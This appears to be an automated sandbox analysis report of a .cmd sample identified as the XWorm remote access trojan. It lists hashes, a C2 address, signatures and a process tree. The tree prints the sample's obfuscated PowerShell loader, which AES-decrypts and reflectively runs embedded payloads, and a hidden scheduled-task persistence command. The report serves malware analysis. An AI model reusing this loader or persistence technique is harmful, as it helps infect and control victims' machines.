Analysis

  • max time kernel
    150s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240611-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system
  • submitted
    30-06-2024 09:57

General

  • Target

    0a0a6608a80b982fc1f0897b89c9ffa58ba58e3c2d1c200155e47c495b0c6150.cmd

  • Size

    500KB

  • MD5

    6e45850d43bde1d6bc68ab6b07daf153

  • SHA1

    427ed64bb89e6bf40e59276768d37152c209e976

  • SHA256

    0a0a6608a80b982fc1f0897b89c9ffa58ba58e3c2d1c200155e47c495b0c6150

  • SHA512

    e44ea25026d2146991e61eb82ed6028af248fb9235b271f665943b432833e3274a3e9ae9ffc912436b294e6a450337cbd251daafad11c926a41cc942042b4f81

  • SSDEEP

    12288:Co8xbtgA4f9Ek3aoC4QvfD2ZK1n6B4XyZYi9lGUnnQ:Co8NtsaCm1nhqD9ginQ

Malware Config

Extracted

Family

xworm

Version

5.0

C2

korkos.now-dns.net:999

Mutex

PloDJK2PhSuWy8rU

Attributes
  • install_file

    USB.exe

aes.plain

Signatures

  • Detect Xworm Payload 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Drops file in System32 directory 10 IoCs
  • Modifies data under HKEY_USERS 42 IoCs
  • Modifies registry class 31 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k DcomLaunch -p
    1⤵
    • Modifies registry class
    PID:784
    • C:\Windows\System32\mousocoreworker.exe
      C:\Windows\System32\mousocoreworker.exe -Embedding
      2⤵
        PID:1796
      • C:\Windows\system32\backgroundTaskHost.exe
        "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
        2⤵
          PID:2456
        • C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe
          C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding
          2⤵
            PID:2264
          • C:\Windows\system32\backgroundTaskHost.exe
            "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
            2⤵
              PID:4964
            • C:\Windows\System32\RuntimeBroker.exe
              C:\Windows\System32\RuntimeBroker.exe -Embedding
              2⤵
                PID:3912
              • C:\Windows\system32\backgroundTaskHost.exe
                "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
                2⤵
                  PID:2288
                • C:\Windows\system32\BackgroundTransferHost.exe
                  "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
                  2⤵
                    PID:2136
                  • C:\Windows\system32\BackgroundTransferHost.exe
                    "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
                    2⤵
                      PID:4848
                    • C:\Windows\system32\backgroundTaskHost.exe
                      "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
                      2⤵
                        PID:1904
                      • C:\Windows\system32\BackgroundTransferHost.exe
                        "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
                        2⤵
                          PID:4464
                        • C:\Windows\system32\BackgroundTransferHost.exe
                          "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
                          2⤵
                            PID:2788
                          • C:\Windows\system32\backgroundTaskHost.exe
                            "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
                            2⤵
                              PID:3796
                            • C:\Windows\system32\BackgroundTaskHost.exe
                              "C:\Windows\system32\BackgroundTaskHost.exe" -ServerName:BackgroundTaskHost.WebAccountProvider
                              2⤵
                                PID:4332
                              • C:\Windows\System32\RuntimeBroker.exe
                                C:\Windows\System32\RuntimeBroker.exe -Embedding
                                2⤵
                                  PID:3380
                              • C:\Windows\system32\svchost.exe
                                C:\Windows\system32\svchost.exe -k RPCSS -p
                                1⤵
                                  PID:892
                                • C:\Windows\system32\svchost.exe
                                  C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
                                  1⤵
                                    PID:936
                                  • C:\Windows\system32\svchost.exe
                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
                                    1⤵
                                      PID:504
                                    • C:\Windows\system32\svchost.exe
                                      C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p
                                      1⤵
                                        PID:856
                                      • C:\Windows\System32\svchost.exe
                                        C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
                                        1⤵
                                          PID:932
                                        • C:\Windows\System32\svchost.exe
                                          C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                                          1⤵
                                            PID:1096
                                          • C:\Windows\system32\svchost.exe
                                            C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                                            1⤵
                                              PID:1108
                                            • C:\Windows\System32\svchost.exe
                                              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                                              1⤵
                                                PID:1132
                                              • C:\Windows\system32\svchost.exe
                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                                                1⤵
                                                • Drops file in System32 directory
                                                PID:1156
                                              • C:\Windows\system32\svchost.exe
                                                C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                                                1⤵
                                                  PID:1236
                                                • C:\Windows\system32\svchost.exe
                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                                                  1⤵
                                                    PID:1300
                                                  • C:\Windows\system32\svchost.exe
                                                    C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                                                    1⤵
                                                      PID:1312
                                                    • C:\Windows\system32\svchost.exe
                                                      C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                                      1⤵
                                                        PID:1408
                                                      • C:\Windows\system32\svchost.exe
                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                                        1⤵
                                                          PID:1444
                                                        • C:\Windows\system32\svchost.exe
                                                          C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                                          1⤵
                                                            PID:1572
                                                          • C:\Windows\System32\svchost.exe
                                                            C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                                            1⤵
                                                              PID:1584
                                                            • C:\Windows\System32\svchost.exe
                                                              C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                                              1⤵
                                                                PID:1632
                                                              • C:\Windows\system32\svchost.exe
                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                                                1⤵
                                                                  PID:1696
                                                                • C:\Windows\System32\svchost.exe
                                                                  C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                                                  1⤵
                                                                    PID:1728
                                                                  • C:\Windows\System32\svchost.exe
                                                                    C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                                                    1⤵
                                                                      PID:1744
                                                                    • C:\Windows\System32\svchost.exe
                                                                      C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                                      1⤵
                                                                        PID:1804
                                                                      • C:\Windows\system32\svchost.exe
                                                                        C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                                        1⤵
                                                                          PID:1908
                                                                        • C:\Windows\system32\svchost.exe
                                                                          C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                                                          1⤵
                                                                            PID:1944
                                                                          • C:\Windows\System32\svchost.exe
                                                                            C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                                            1⤵
                                                                              PID:1956
                                                                            • C:\Windows\System32\svchost.exe
                                                                              C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                                              1⤵
                                                                                PID:2024
                                                                              • C:\Windows\system32\svchost.exe
                                                                                C:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p
                                                                                1⤵
                                                                                  PID:2076
                                                                                • C:\Windows\system32\svchost.exe
                                                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                                                  1⤵
                                                                                    PID:2144
                                                                                  • C:\Windows\System32\svchost.exe
                                                                                    C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                                                    1⤵
                                                                                      PID:2152
                                                                                    • C:\Windows\System32\svchost.exe
                                                                                      C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                                                      1⤵
                                                                                        PID:2272
                                                                                      • C:\Windows\system32\svchost.exe
                                                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                                                        1⤵
                                                                                          PID:2416
                                                                                        • C:\Windows\system32\svchost.exe
                                                                                          C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                                                          1⤵
                                                                                            PID:2424
                                                                                          • C:\Windows\system32\svchost.exe
                                                                                            C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
                                                                                            1⤵
                                                                                            • Drops file in System32 directory
                                                                                            • Modifies data under HKEY_USERS
                                                                                            PID:2596
                                                                                          • C:\Windows\system32\svchost.exe
                                                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                                            1⤵
                                                                                              PID:2664
                                                                                            • C:\Windows\System32\svchost.exe
                                                                                              C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                                              1⤵
                                                                                                PID:2676
                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                                                1⤵
                                                                                                  PID:2684
                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                  C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                                                  1⤵
                                                                                                    PID:2816
                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
                                                                                                    1⤵
                                                                                                      PID:2644
                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                      C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                                                      1⤵
                                                                                                        PID:3332
                                                                                                      • C:\Windows\Explorer.EXE
                                                                                                        C:\Windows\Explorer.EXE
                                                                                                        1⤵
                                                                                                        • Suspicious use of UnmapMainImage
                                                                                                        PID:3420
                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                          C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\0a0a6608a80b982fc1f0897b89c9ffa58ba58e3c2d1c200155e47c495b0c6150.cmd"
                                                                                                          2⤵
                                                                                                          • Suspicious use of WriteProcessMemory
                                                                                                          PID:4480
                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                            cmd /c "set __=^&rem"
                                                                                                            3⤵
                                                                                                              PID:4708
                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                              cmd /c "set __=^&rem"
                                                                                                              3⤵
                                                                                                                PID:3688
                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                cmd /c "set __=^&rem"
                                                                                                                3⤵
                                                                                                                  PID:3500
                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                  cmd /c "set __=^&rem"
                                                                                                                  3⤵
                                                                                                                    PID:3916
                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                    cmd /c "set __=^&rem"
                                                                                                                    3⤵
                                                                                                                      PID:3160
                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                      cmd /c "set __=^&rem"
                                                                                                                      3⤵
                                                                                                                        PID:3372
                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                        cmd /c "set __=^&rem"
                                                                                                                        3⤵
                                                                                                                          PID:3448
                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                          cmd /c "set __=^&rem"
                                                                                                                          3⤵
                                                                                                                            PID:3096
                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                            cmd /c "set __=^&rem"
                                                                                                                            3⤵
                                                                                                                              PID:3592
                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                              C:\Windows\system32\cmd.exe /S /D /c" echo cls;function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('wNcFKur0Jl7450HdnpBnzjJ0VkczGUUgZCayB4N/z5k='); $aes_var.IV=[System.Convert]::FromBase64String('LnVH8Q3dknv++SzltewTug=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $ZpTQS=New-Object System.IO.MemoryStream(,$param_var); $OYGBL=New-Object System.IO.MemoryStream; $STZRP=New-Object System.IO.Compression.GZipStream($ZpTQS, [IO.Compression.CompressionMode]::Decompress); $STZRP.CopyTo($OYGBL); $STZRP.Dispose(); $ZpTQS.Dispose(); $OYGBL.Dispose(); $OYGBL.ToArray();}function execute_function($param_var,$param2_var){ $QnAOk=[System.Reflection.Assembly]::Load([byte[]]$param_var); $GDXEp=$QnAOk.EntryPoint; $GDXEp.Invoke($null, $param2_var);}$pPyzM = 'C:\Users\Admin\AppData\Local\Temp\0a0a6608a80b982fc1f0897b89c9ffa58ba58e3c2d1c200155e47c495b0c6150.cmd';$host.UI.RawUI.WindowTitle = $pPyzM;$CtNBM=[System.IO.File]::ReadAllText($pPyzM).Split([Environment]::NewLine);foreach ($oZZUg in $CtNBM) { if ($oZZUg.StartsWith('IrzEsjacAQqOMrEShQQm')) { $GKlON=$oZZUg.Substring(20); break; }}$payloads_var=[string[]]$GKlON.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));$payload3_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[2].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var $null;execute_function $payload3_var (,[string[]] ('')); "
                                                                                                                              3⤵
                                                                                                                                PID:2740
                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
                                                                                                                                3⤵
                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                                                PID:2436
                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\0a0a6608a80b982fc1f0897b89c9ffa58ba58e3c2d1c200155e47c495b0c6150.cmd" "
                                                                                                                                  4⤵
                                                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                                                  PID:2056
                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                    cmd /c "set __=^&rem"
                                                                                                                                    5⤵
                                                                                                                                      PID:1840
                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                      cmd /c "set __=^&rem"
                                                                                                                                      5⤵
                                                                                                                                        PID:3956
                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                        cmd /c "set __=^&rem"
                                                                                                                                        5⤵
                                                                                                                                          PID:2572
                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                          cmd /c "set __=^&rem"
                                                                                                                                          5⤵
                                                                                                                                            PID:4952
                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                            cmd /c "set __=^&rem"
                                                                                                                                            5⤵
                                                                                                                                              PID:2308
                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                              cmd /c "set __=^&rem"
                                                                                                                                              5⤵
                                                                                                                                                PID:3004
                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                cmd /c "set __=^&rem"
                                                                                                                                                5⤵
                                                                                                                                                  PID:2264
                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                  cmd /c "set __=^&rem"
                                                                                                                                                  5⤵
                                                                                                                                                    PID:2500
                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                    cmd /c "set __=^&rem"
                                                                                                                                                    5⤵
                                                                                                                                                      PID:4876
                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                      C:\Windows\system32\cmd.exe /S /D /c" echo cls;function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('wNcFKur0Jl7450HdnpBnzjJ0VkczGUUgZCayB4N/z5k='); $aes_var.IV=[System.Convert]::FromBase64String('LnVH8Q3dknv++SzltewTug=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $ZpTQS=New-Object System.IO.MemoryStream(,$param_var); $OYGBL=New-Object System.IO.MemoryStream; $STZRP=New-Object System.IO.Compression.GZipStream($ZpTQS, [IO.Compression.CompressionMode]::Decompress); $STZRP.CopyTo($OYGBL); $STZRP.Dispose(); $ZpTQS.Dispose(); $OYGBL.Dispose(); $OYGBL.ToArray();}function execute_function($param_var,$param2_var){ $QnAOk=[System.Reflection.Assembly]::Load([byte[]]$param_var); $GDXEp=$QnAOk.EntryPoint; $GDXEp.Invoke($null, $param2_var);}$pPyzM = 'C:\Users\Admin\AppData\Local\Temp\0a0a6608a80b982fc1f0897b89c9ffa58ba58e3c2d1c200155e47c495b0c6150.cmd';$host.UI.RawUI.WindowTitle = $pPyzM;$CtNBM=[System.IO.File]::ReadAllText($pPyzM).Split([Environment]::NewLine);foreach ($oZZUg in $CtNBM) { if ($oZZUg.StartsWith('IrzEsjacAQqOMrEShQQm')) { $GKlON=$oZZUg.Substring(20); break; }}$payloads_var=[string[]]$GKlON.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));$payload3_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[2].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var $null;execute_function $payload3_var (,[string[]] ('')); "
                                                                                                                                                      5⤵
                                                                                                                                                        PID:5076
                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
                                                                                                                                                        5⤵
                                                                                                                                                        • Blocklisted process makes network request
                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                                                                        PID:2372
                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\0a0a6608a80b982fc1f0897b89c9ffa58ba58e3c2d1c200155e47c495b0c6150')
                                                                                                                                                          6⤵
                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                          PID:656
                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote startup_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$phantom-SCV.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
                                                                                                                                                          6⤵
                                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                          PID:2180
                                                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                                                C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                                                                                1⤵
                                                                                                                                                  PID:3552
                                                                                                                                                • C:\Windows\System32\svchost.exe
                                                                                                                                                  C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                                                                                  1⤵
                                                                                                                                                    PID:5116
                                                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                                                                    1⤵
                                                                                                                                                    • Modifies data under HKEY_USERS
                                                                                                                                                    PID:4700
                                                                                                                                                  • C:\Windows\System32\svchost.exe
                                                                                                                                                    C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                                                                                    1⤵
                                                                                                                                                      PID:4980
                                                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                                                      C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
                                                                                                                                                      1⤵
                                                                                                                                                        PID:792
                                                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                                                        C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                                                                                        1⤵
                                                                                                                                                        • Modifies data under HKEY_USERS
                                                                                                                                                        PID:732
                                                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
                                                                                                                                                        1⤵
                                                                                                                                                          PID:4828
                                                                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
                                                                                                                                                          1⤵
                                                                                                                                                            PID:2780

                                                                                                                                                          Network

                                                                                                                                                          MITRE ATT&CK Matrix ATT&CK v13

                                                                                                                                                          Execution

                                                                                                                                                          Command and Scripting Interpreter

                                                                                                                                                          1
                                                                                                                                                          T1059

                                                                                                                                                          PowerShell

                                                                                                                                                          1
                                                                                                                                                          T1059.001

                                                                                                                                                          Replay Monitor

                                                                                                                                                          Loading Replay Monitor...

                                                                                                                                                          Downloads

                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                                                                                                                                                            Filesize

                                                                                                                                                            3KB

                                                                                                                                                            MD5

                                                                                                                                                            50c591ec2a1e49297738ea9f28e3ad23

                                                                                                                                                            SHA1

                                                                                                                                                            137e36b4c7c40900138a6bcf8cf5a3cce4d142af

                                                                                                                                                            SHA256

                                                                                                                                                            7648d785bda8cef95176c70711418cf3f18e065f7710f2ef467884b4887d8447

                                                                                                                                                            SHA512

                                                                                                                                                            33b5fa32501855c2617a822a4e1a2c9b71f2cf27e1b896cf6e5a28473cfd5e6d126840ca1aa1f59ef32b0d0a82a2a95c94a9cc8b845367b61e65ec70d456deec

                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
                                                                                                                                                            Filesize

                                                                                                                                                            2KB

                                                                                                                                                            MD5

                                                                                                                                                            005bc2ef5a9d890fb2297be6a36f01c2

                                                                                                                                                            SHA1

                                                                                                                                                            0c52adee1316c54b0bfdc510c0963196e7ebb430

                                                                                                                                                            SHA256

                                                                                                                                                            342544f99b409fd415b305cb8c2212c3e1d95efc25e78f6bf8194e866ac45b5d

                                                                                                                                                            SHA512

                                                                                                                                                            f8aadbd743495d24d9476a5bb12c8f93ffb7b3cc8a8c8ecb49fd50411330c676c007da6a3d62258d5f13dd5dacc91b28c5577f7fbf53c090b52e802f5cc4ea22

                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                                                                            Filesize

                                                                                                                                                            1KB

                                                                                                                                                            MD5

                                                                                                                                                            9860d4aa4865668d89958db7bee80981

                                                                                                                                                            SHA1

                                                                                                                                                            1012f46f5da45d3d0870890cafba9e0a5111b7cb

                                                                                                                                                            SHA256

                                                                                                                                                            b0fa0a73f5999174b8024330394544ad3922b7f8f1eed7521c225c2a00b13fcf

                                                                                                                                                            SHA512

                                                                                                                                                            a10dce73d96634d6831336244eeda84e4ae126875f8142449d1575640d4cfb5aca225d47bb6bdb9a936887cf4cbbfe859e1b57584b7f61d9055381da238f0ee3

                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_d1admkkt.vxa.ps1
                                                                                                                                                            Filesize

                                                                                                                                                            60B

                                                                                                                                                            MD5

                                                                                                                                                            d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                                                            SHA1

                                                                                                                                                            6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                                                            SHA256

                                                                                                                                                            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                                                            SHA512

                                                                                                                                                            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                                                          • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work
                                                                                                                                                            Filesize

                                                                                                                                                            2KB

                                                                                                                                                            MD5

                                                                                                                                                            8abf2d6067c6f3191a015f84aa9b6efe

                                                                                                                                                            SHA1

                                                                                                                                                            98f2b0a5cdb13cd3d82dc17bd43741bf0b3496f7

                                                                                                                                                            SHA256

                                                                                                                                                            ee18bd3259f220c41062abcbe71a421da3e910df11b9f86308a16cdc3a66fbea

                                                                                                                                                            SHA512

                                                                                                                                                            c2d686a6373efcff583c1ef50c144c59addb8b9c4857ccd8565cd8be3c94b0ac0273945167eb04ebd40dfb0351e4b66cffe4c4e478fb7733714630a11f765b63

                                                                                                                                                          • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work
                                                                                                                                                            Filesize

                                                                                                                                                            2KB

                                                                                                                                                            MD5

                                                                                                                                                            f313c5b4f95605026428425586317353

                                                                                                                                                            SHA1

                                                                                                                                                            06be66fa06e1cffc54459c38d3d258f46669d01a

                                                                                                                                                            SHA256

                                                                                                                                                            129d0b993cd3858af5b7e87fdf74d8e59e6f2110184b5c905df8f5f6f2c39d8b

                                                                                                                                                            SHA512

                                                                                                                                                            b87a829c86eff1d10e1590b18a9909f05101a535e5f4cef914a4192956eb35a8bfef614c9f95d53783d77571687f3eb3c4e8ee2f24d23ad24e0976d8266b8890

                                                                                                                                                          • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work
                                                                                                                                                            Filesize

                                                                                                                                                            2KB

                                                                                                                                                            MD5

                                                                                                                                                            ceb7caa4e9c4b8d760dbf7e9e5ca44c5

                                                                                                                                                            SHA1

                                                                                                                                                            a3879621f9493414d497ea6d70fbf17e283d5c08

                                                                                                                                                            SHA256

                                                                                                                                                            98c054088df4957e8d6361fd2539c219bcf35f8a524aad8f5d1a95f218e990e9

                                                                                                                                                            SHA512

                                                                                                                                                            1eddfbf4cb62d3c5b4755a371316304aaeabb00f01bad03fb4f925a98a2f0824f613537d86deddd648a74d694dc13ed5183e761fdc1ec92589f6fa28beb7fbff

                                                                                                                                                          • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work
                                                                                                                                                            Filesize

                                                                                                                                                            2KB

                                                                                                                                                            MD5

                                                                                                                                                            7d612892b20e70250dbd00d0cdd4f09b

                                                                                                                                                            SHA1

                                                                                                                                                            63251cfa4e5d6cbf6fb14f6d8a7407dbe763d3f5

                                                                                                                                                            SHA256

                                                                                                                                                            727c9e7b91e144e453d5b32e18f12508ee84dabe71bc852941d9c9b4923f9e02

                                                                                                                                                            SHA512

                                                                                                                                                            f8d481f3300947d49ce5ab988a9d4e3154746afccc97081cbed1135ffb24fc107203d485dda2d5d714e74e752c614d8cfd16781ea93450fe782ffae3f77066d1

                                                                                                                                                          • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work
                                                                                                                                                            Filesize

                                                                                                                                                            2KB

                                                                                                                                                            MD5

                                                                                                                                                            1e8e2076314d54dd72e7ee09ff8a52ab

